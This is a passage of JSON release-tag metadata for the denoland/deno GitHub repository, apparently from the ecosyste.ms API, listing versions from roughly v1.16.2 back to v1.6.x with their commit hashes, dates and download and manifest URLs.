0","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45